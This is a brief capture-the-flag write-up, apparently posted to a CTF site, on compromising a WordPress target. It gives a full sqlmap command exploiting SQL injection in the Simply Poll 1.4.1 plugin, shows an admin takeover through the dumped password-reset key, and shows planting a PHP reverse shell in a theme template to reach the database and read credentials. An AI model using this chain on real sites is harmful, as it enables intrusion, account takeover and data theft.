Tags: sqli shell 

Rating: 0

Target is a WordPress installation with the plugin "Simply Poll 1.4.1" which is known to be SQL Injectable at the pollid parameter.

go to http://target/wp-login.php and request a password reset for 'admin', so the user_activation_key field in wp_users gets populated.

fire up sqlmap:

*sqlmap -u "http://target/wp-admin/admin-ajax.php" --data="action=spAjaxResults&pollid=2" --dump -D wordpress --threads=10 --random-agent --dbms=mysql --level=5 --risk=3*

after a while, sqlmap will dump the database, find the user_activation_key, go to http://target/wp-login.php?action=rp&login=admin&key=[the_user_activation_key]
set a password for admin, then log in.

Go to the theme editor and edit the 404 template for the twentyseventeen theme, replace it with a php reverse shell like https://github.com/mbs3c/wordy/blob/master/php-reverse-shell.php, set the IP and port of a box with a reverse netcat listener, save, then go to http://target/wp-content/themes/twentyseventeen/404.php
in the reverse shell, navigate to /var/www/html, grep the DB connection parameters from wp-config.php, then peek around mysql. Don't try to run an interactive mysql shell, it won't work, use '-e [cmd]' instead.

*mysql -uroot -pXXXXX -e 'show databases;'*

this shows there's an SHX database, let's see what's inside

*mysql -uroot -pXXXXX SHX -e 'show tables';*

there should be just one table, select * from it, enjoy your flag.

tamas_dxw – Dec. 5, 2017, 7:28 p.m.

(or you can just ask sqlmap to discover all DBS, but where's the fun in that)